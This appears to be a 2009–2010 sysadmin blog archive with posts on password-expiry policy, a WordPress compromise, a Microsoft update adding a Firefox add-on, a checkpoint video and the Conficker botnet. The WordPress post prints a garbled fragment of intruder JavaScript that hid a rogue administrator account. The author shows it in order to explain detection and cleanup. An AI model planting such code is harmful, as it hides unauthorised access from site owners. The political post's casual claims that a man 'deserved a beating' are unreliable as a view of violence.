/usr/local.com

20%

January 2nd, 2010 | by | security, sysadmin

Jan
02

We launched our Hosted Exchange 2007 Product just over a year ago. And for the most part, things have gone great.

One of our early decisions was to balance the security of the system while making the system as user friendly as possible. Originally, we had a pretty strict password policy. We soon found that many of our customers were not too happy with this policy and thought it was too much. Were we out of control security freaks? Shouldn’t the customer appreciate the steps that we are taking to not only secure our servers, but their information!

Looking around at other vendors, we quickly found that we may be a bit too harsh. Take Gmail for example. Sure its not exchange. But then again it has over 100 million users. If they had massive issues with security and hacking, they clearly have it under control behind the scenes so things do not get out of hand.

And have you ever been prompted to change your password on gmail? I haven’t.

So we compromised. We altered the time between when the system forces you to change your password. We altered the number of passwords that you could recycle. And we also added a somewhat buried feature in our customer portal. That feature, ‘allow passwords to never expire’

Holy crap! Let’s just blow a huge freaking hole in the security system shall we.

This was a feature that we were not all that happy about, but with the other measures in place we figured we would avoid passwords such as abc123. It makes the end user happy, we have some level of security though not as high and tight as we would like. But its better than having things wide open.

Now here is the shocking part of this. 20% of our users have this feature enabled. 20-feaking-percent! I was really hoping for this number to be in the 5-10% range.
But no, 1 in 5 of our users will never change their password again.

Or will they?

I’m currently developing a nag script that will send out a reminder to the end users ever couple of months. Not enough to completely annoy the heck out of them. But hopefully enough to get a good portion of that 20% to change their passwords on a semi-regular basis.

So what do you do for your password policy? Leave your tips and tricks in the comments section. We’d like to hear what you think is an acceptable policy to stay secure!

Comments Closed

WordPress Security Concern

September 13th, 2009 | by | security, sysadmin

Sep
13

I’m not sure if you’ve applied the latest updates for wordpress but I did last week. However, it appears that someone got in to one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming that this was due to a security bug in 2.8.3 as they were in when that was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit on the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name for an admin. And peaking in the wp_usermeta table, I noticed the following attribute was assigned to their firstname:

for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator ((d+)) if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator ((d+))Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);

Its not formatted the greatest, but basically, it hides the username from the list. Nice eh! Simply deleting this entry made the user show up in the user list where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had starting defacing the site or hiding other gems on there.

-Matt

Comments Closed

Business as usual

May 31st, 2009 | by | micro$oft, security

May
31

Over the past couple of years, I have been able to tolerate Microsoft a bit more than I used to. When your primary income relies on people purchasing Exchange and OCS accounts that you provide the back end provisioning and automation for, you quickly realize where your bread is buttered.

But this sort of crap really needs to stop. Yes, its their operating system. But that doesn’t excuse installing add-ons to 3rd party applications and disabling the uninstall options. I’m with the writer of this article, this is a great way to get your customers to not trust you and precisely the reason I haven’t had windows on my desktop for 8 years.

A routine security update for a Microsoft Windows component installed on tens of millions of computers has quietly installed an extra add-on for an untold number of users surfing the Web with Mozilla’s Firefox Web browser.

Earlier this year, Microsoft shipped a bundle of updates known as a “service pack” for a programming platform called the Microsoft .NET Framework, which Microsoft and plenty of third-party developers use to run a variety of interactive programs on Windows.

The service pack for the .NET Framework, like other updates, was pushed out to users through the Windows Update Web site. A number of readers had never heard of this platform before Windows Update started offering the service pack for it, and many of you wanted to know whether it was okay to go ahead and install this thing. Having earlier checked to see whether the service pack had caused any widespread problems or interfered with third-party programs — and not finding any that warranted waving readers away from this update — I told readers not to worry and to go ahead and install it.

source

Comments Closed

Some people need a beating…

April 18th, 2009 | by | politics

Apr
18

OK, I get people wanting to stand up for their rights, but from the very beginning, this guy was an arrogant asshole. He has no respect for authority. He was abusive and non cooperative when asked simple questions. He deserved to be detained.

Now, the person stating he has no rights at a checkpoint is NOT cool. But I still think he was an ass and deserved a thumping. And that’s just listening to the first 5 minutes of the video.

The reason that this blew up and the reason that he was detained is by not answering a few simple questions and being an ass, he instantly raised suspicion that he was doing something illegal. If he had played it cool, I’m sure he would have been through the checkpoint in under a minute without them ever needing to check his trunk or anything else. But because he was abusive and non-cooperative, he was detained. I’m not saying that the border patrol agents were perfect here. But some people are just idiots and need a good beating with the clue-by-four!

NOTE: I do _NOT_ agree with the title of the video. I think it should have been ‘Dumbass makes a fool of himself to a federal agent!’

Comments Closed

How the Conficker Problem Just Got Much Worse

April 5th, 2009 | by | security

Apr
05

On the surface, April 1 came and went without a peep from the dreaded Conficker megaworm. But security experts see a frightening reality, one where Conficker is now more powerful and more dangerous than ever.

In the first minute of April 1, Conficker did exactly what everyone knew it was going to do: It successfully phoned home for an update. And while it was fun to imagine what nasty payload that update may have included (it was fun, wasn’t it?), the result was not outwardly catastrophic; rather than a blueprint for world domination, the update contained instructions on how to dig in even deeper.

“The worm did exactly what everyone thought it was going to do, which is update itself,” security expert Dan Kaminsky, who helped develop a widely-used Conficker scanner in the days leading up to April 1, told us. “The world wants there to be fireworks, or some Ebola-class, computers-exploding-all-over-the-world event or God knows what, but the reality is…the Conficker developers have cemented their ability to push updates through any fences the good guys have managed to build in February and March.”

And here’s why that is deeply, deeply scary. As we explained, Conficker has built a zombie botnet infrastructure by registering hundreds of spam DNS names (askcw.com.ru, and the like), which it then links up and uses as nodes for infected machines to contact for instructions. In its earlier forms, Conficker attempted to register 250 such DNS names per day. But with the third version of the software, the Conficker.c variant which has been floating around for the last month or so, the number of spam DNS takeovers was boosted to 50,000 per day—a number security pros can no longer keep up with.

source

Yikes! This paints a pretty scary picture.

Comments Closed

Older Posts